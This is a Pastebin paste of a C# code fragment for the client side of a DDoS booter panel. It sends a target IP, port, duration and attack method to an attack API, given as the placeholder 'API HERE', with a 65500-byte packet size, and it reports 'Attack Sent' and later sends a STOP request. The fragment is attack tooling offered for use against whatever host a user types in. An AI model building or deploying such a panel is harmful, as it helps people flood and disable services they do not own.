Advertisement
dfgjiyijb

HHHHHH

Nov 6th, 2020 (edited)
42
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 1.55 KB | None | 0 0
  1.  webBrowser1.Navigate("API HERE" + "&host=" + tb_host.Text + "&port=" + tb_port.Text + "&time=" + logInComboBox1.Text + "&method=" + logInComboBox2.Text + "&size=65500");
  2.             MessageBox.Show("\r\nIP:" + tb_host.Text + "\r\nPort:" + tb_port.Text + "\r\nTime:" + logInComboBox1.Text + "\r\nMethod:" + logInComboBox2.Text, "Attack Sent");
  3.             tb_host.Enabled = false;
  4.             tb_port.Enabled = false;
  5.             logInComboBox1.Enabled = false;
  6.             logInComboBox2.Enabled = false;
  7.             logInButton1.Enabled = false;
  8.             timer1.Interval = 10000; // here time in milliseconds
  9.             timer1.Start();
  10.             logInLabel14.Text = "Concurrent Attacks 1/1";
  11.             logInRichTextBox2.Text = "IP:" + tb_host.Text + "|" + "Port:" + tb_port.Text + "|" + "Time:" + logInComboBox1.Text + "|" + "Method:" + logInComboBox2.Text + "|" + "Attack Sent>" + "API - Server 1";
  12.  
  13.  
  14.  
  15.             logInButton1.Enabled = true;
  16.             tb_host.Enabled = true;
  17.             tb_port.Enabled = true;
  18.             logInComboBox1.Enabled = true;
  19.             logInComboBox2.Enabled = true;
  20.             logInLabel14.Text = "Concurrent Attacks 0/1";
  21.             timer1.Stop();
  22.  
  23.  
  24.             webBrowser1.Navigate("API HERE" + "&host=" + tb_host.Text + "&port=" + tb_port.Text + "&time=" + "&method=STOP" + logInComboBox2.Text + "&size=");
  25.             logInRichTextBox2.Text = "IP:" + tb_host.Text + "|" + "Port:" + tb_port.Text + "|" + "Time:" + logInComboBox1.Text + "|" + "Method:" + logInComboBox2.Text + "|" + "Attack Stop>" + "API - Server 1";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement